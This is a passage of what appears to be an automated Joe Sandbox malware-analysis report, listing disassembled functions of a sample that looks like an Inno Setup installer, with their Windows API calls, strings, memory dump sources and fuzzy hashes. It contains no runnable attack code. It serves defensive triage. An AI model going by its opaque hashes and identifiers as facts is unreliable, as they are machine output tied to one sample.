                                                              • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastLoadModuleProcType
                                                            • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                            • API String ID: 1914119943-2711329623
                                                            • Opcode ID: 1f12b3bfc7457beb1676229d9a9ac5705a2be6c49cf36285249ab65db7443b7f
                                                            • Instruction ID: a27b950e9f8baa5d3fd7d83d3f5f0f06fd95d714c0010da27a3b0cf72a10e13f
                                                            • Opcode Fuzzy Hash: 1f12b3bfc7457beb1676229d9a9ac5705a2be6c49cf36285249ab65db7443b7f
                                                            • Instruction Fuzzy Hash: AB319471B00604AFDB12EFAACC41D5BB7BDEB897557528466FC04D7252DA38DD04CB28
                                                            APIs
                                                            • RectVisible.GDI32(?,?), ref: 00416E23
                                                            • SaveDC.GDI32(?), ref: 00416E37
                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                            • RestoreDC.GDI32(?,?), ref: 00416E75
                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                            • FrameRect.USER32(?,?,?), ref: 00416F28
                                                            • DeleteObject.GDI32(?), ref: 00416F32
                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                            • FrameRect.USER32(?,?,?), ref: 00416F75
                                                            • DeleteObject.GDI32(?), ref: 00416F7F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                            • String ID:
                                                            • API String ID: 375863564-0
                                                            • Opcode ID: e9e72d8966bdaf80817d84d11445bcfe7b70581a29c6dab9ad28bd9778771da1
                                                            • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                            • Opcode Fuzzy Hash: e9e72d8966bdaf80817d84d11445bcfe7b70581a29c6dab9ad28bd9778771da1
                                                            • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                            • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                            • String ID:
                                                            • API String ID: 1694776339-0
                                                            • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                            • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                            • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                            • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                            APIs
                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                            • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                            • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                            • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                            • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                            • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                            • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                            • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$EnableItem$System
                                                            • String ID:
                                                            • API String ID: 3985193851-0
                                                            • Opcode ID: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                            • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                            • Opcode Fuzzy Hash: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                            • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                            APIs
                                                            • FreeLibrary.KERNEL32(10000000), ref: 00481499
                                                            • FreeLibrary.KERNEL32(00000000), ref: 004814AD
                                                            • SendNotifyMessageA.USER32(000103F8,00000496,00002710,00000000), ref: 0048151F
                                                            Strings
                                                            • DeinitializeSetup, xrefs: 00481395
                                                            • Not restarting Windows because Setup is being run from the debugger., xrefs: 004814CE
                                                            • Deinitializing Setup., xrefs: 004812FA
                                                            • Restarting Windows., xrefs: 004814FA
                                                            • GetCustomSetupExitCode, xrefs: 00481339
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary$MessageNotifySend
                                                            • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                            • API String ID: 3817813901-1884538726
                                                            • Opcode ID: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                            • Instruction ID: fb8259b883485ef9100c7f5c1e95e74d54582b152ce66d5af1bc00326fba4159
                                                            • Opcode Fuzzy Hash: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                            • Instruction Fuzzy Hash: 4451A034704240AFD711EB69D895B2E7BE9FB59704F50887BE801C72B1DB38A846CB5D
                                                            APIs
                                                            • SHGetMalloc.SHELL32(?), ref: 00461A33
                                                            • GetActiveWindow.USER32 ref: 00461A97
                                                            • CoInitialize.OLE32(00000000), ref: 00461AAB
                                                            • SHBrowseForFolder.SHELL32(?), ref: 00461AC2
                                                            • CoUninitialize.OLE32(00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AD7
                                                            • SetActiveWindow.USER32(?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AED
                                                            • SetActiveWindow.USER32(?,?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AF6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                            • String ID: A
                                                            • API String ID: 2684663990-3554254475
                                                            • Opcode ID: 6bf2c69099c90f86a267e24c634b690acb1506b8ce1301c413aa044d63ad6a36
                                                            • Instruction ID: 1302daae15839a874164301860301a8b98b45f7dd6f96d3c0913b4bd506695dd
                                                            • Opcode Fuzzy Hash: 6bf2c69099c90f86a267e24c634b690acb1506b8ce1301c413aa044d63ad6a36
                                                            • Instruction Fuzzy Hash: 64314FB0E00248AFDB00EFE6D885A9EBBF8EB09304F51447AF404E7251E7785A44CF59
                                                            APIs
                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85,?,?,00000000,004731F4), ref: 00472C8C
                                                              • Part of subcall function 0042CDA4: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE1A
                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85), ref: 00472D03
                                                            • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000), ref: 00472D09
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                            • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                            • API String ID: 884541143-1710247218
                                                            • Opcode ID: e52ff7fc8aad4532f2121d8bd5e8e7392c558ff45c5d59df65582d72ab666be0
                                                            • Instruction ID: a2498b92200520dbea2b626460b71344a260e4c3afc9e0684e621ff8b49742b9
                                                            • Opcode Fuzzy Hash: e52ff7fc8aad4532f2121d8bd5e8e7392c558ff45c5d59df65582d72ab666be0
                                                            • Instruction Fuzzy Hash: 731122303005087BD721EA66DD82B9E73ACCB88714F60853BB404B72D1CB7CEE02865C
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D621
                                                            • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D631
                                                            • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D641
                                                            • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D651
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                            • API String ID: 190572456-3516654456
                                                            • Opcode ID: fd665f86a4c397101f291ae51b8d6e2550680f8309e6d6ef8ebab45c29bb7339
                                                            • Instruction ID: 6d5035e3426567f523c7c0f539c0fc89aa7e9857b83a97dd2a4ec5b9764e3533
                                                            • Opcode Fuzzy Hash: fd665f86a4c397101f291ae51b8d6e2550680f8309e6d6ef8ebab45c29bb7339
                                                            • Instruction Fuzzy Hash: 0D01ECB0900740DEEB24DFB6ACC572236A5ABA470AF14C13B980DD62A2D779044ADF2C
                                                            APIs
                                                            • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                            • 73EA4D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                            • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                            • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                            • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Color$StretchText
                                                            • String ID:
                                                            • API String ID: 2984075790-0
                                                            • Opcode ID: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                            • Instruction ID: 0e7efefeb240adcf91359f1fba61dc18d1efd34d50a4dd97ee32c9a960060edb
                                                            • Opcode Fuzzy Hash: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                            • Instruction Fuzzy Hash: 9861C5B5A00105EFCB40EFADD985E9AB7F8AF08314B10856AF918DB261C735ED41CF68
                                                            APIs
                                                              • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004580B4,?, /s ",?,regsvr32.exe",?,004580B4), ref: 00458026
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseDirectoryHandleSystem
                                                            • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                            • API String ID: 2051275411-1862435767
                                                            • Opcode ID: 55f146e1ef8f4e902545c9b8fd40e77843967da88cee367bff3e11b3e7507cae
                                                            • Instruction ID: 809e342f07c36c5fe80e3456e65159aecd70c9e1b429d99a18f855550af0e9f5
                                                            • Opcode Fuzzy Hash: 55f146e1ef8f4e902545c9b8fd40e77843967da88cee367bff3e11b3e7507cae
                                                            • Instruction Fuzzy Hash: 97411570A043086BDB10EFD5D842B8EF7B9AB49705F51407FA904BB292DF789A0D8B19
                                                            APIs
                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1B9
                                                            • GetSysColor.USER32(00000014), ref: 0044D1C0
                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044D1D8
                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D201
                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D20B
                                                            • GetSysColor.USER32(00000010), ref: 0044D212
                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044D22A
                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D253
                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D27E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Text$Color$Draw$OffsetRect
                                                            • String ID:
                                                            • API String ID: 1005981011-0
                                                            • Opcode ID: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                            • Instruction ID: 3cb6cff9cb4fe1f97db5fca9cf7ecf77bacdc285bba155e9e6a5fbb2dce94e66
                                                            • Opcode Fuzzy Hash: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                            • Instruction Fuzzy Hash: 4921CFB42015007FC710FB6ACD8AE8B7BDCDF19319B01857AB918EB393C678DD408669
                                                            APIs
                                                            • GetFocus.USER32 ref: 0041B755
                                                            • 73E9A570.USER32(?), ref: 0041B761
                                                            • 73E98830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                            • 73E922A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                            • 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                            • 73E98830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: E98830$A570A6310E922Focus
                                                            • String ID: k H
                                                            • API String ID: 184897721-1447039187
                                                            • Opcode ID: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                            • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                            • Opcode Fuzzy Hash: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                            • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                            APIs
                                                            • GetFocus.USER32 ref: 0041BA27
                                                            • 73E9A570.USER32(?), ref: 0041BA33
                                                            • 73E98830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                            • 73E922A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                            • 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                            • 73E98830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: E98830$A570A6310E922Focus
                                                            • String ID: k H
                                                            • API String ID: 184897721-1447039187
                                                            • Opcode ID: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                            • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                            • Opcode Fuzzy Hash: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                            • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                            APIs
                                                              • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495F55
                                                            • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495F69
                                                            • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495F83
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F8F
                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F95
                                                            • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495FA8
                                                            Strings
                                                            • Deleting Uninstall data files., xrefs: 00495ECB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
